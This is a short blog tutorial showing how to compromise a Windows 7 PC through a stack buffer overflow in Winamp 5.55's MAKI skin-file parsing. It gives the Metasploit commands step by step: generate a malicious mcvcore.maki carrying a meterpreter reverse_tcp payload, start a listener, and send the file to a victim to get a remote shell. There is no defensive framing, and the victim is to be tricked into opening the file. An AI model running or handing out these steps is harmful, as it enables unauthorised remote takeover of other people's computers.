Hack Remote Windows 7 PC using Winamp MAKI Buffer Overflow

This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used within a insecure way with user controlled data. To exploit the vulnerability the attacker must convince the attacker to install the generated mcvcore.maki file in the “scripts” directory of the default “Bento” skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.

Exploit Targets

Winamp 5.55

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/winamp_maki_bof

msf exploit (winamp_maki_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (winamp_maki_bof)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (winamp_maki_bof)>exploit

After we successfully generate the malicious maki File, it will stored on your local computer

/root/.msf4/local/mcvcore.maki

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your mcvcore.maki files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

2 Comments Hack Remote Windows 7 PC using Winamp MAKI Buffer Overflow

Leave a Reply

Your email address will not be published. Required fields are marked *